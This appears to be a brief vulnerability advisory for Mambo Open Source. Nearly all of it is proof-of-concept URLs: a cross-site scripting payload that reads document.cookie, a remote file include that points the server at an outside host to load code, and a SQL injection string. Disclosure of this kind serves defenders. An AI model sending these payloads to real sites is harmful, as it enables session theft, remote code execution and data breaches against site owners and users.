Mambo Open Source Multiple Input Validation Vulnerabilities

Mambo Open Source Multiple Input Validation Vulnerabilities

No exploits are required to carry out attacks. The following proof of concepts have been provided:

Cross-Site Scripting:
http://www.example.com/index.php?option=com_content&task=view&id=15&Itemid=2&limit=1">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&limitstart=1

Remote File Include:
http://www.example.com/includes/Cache/Lite/Function.php?mosConfig_absolute_path=http://www.example.org/

SQL injection:
http://www.example.com/index.php?option=com_remository&Itemid=27&func=fileinfo&parent=folder&filecatid=499%20and%201=0[SQL]/*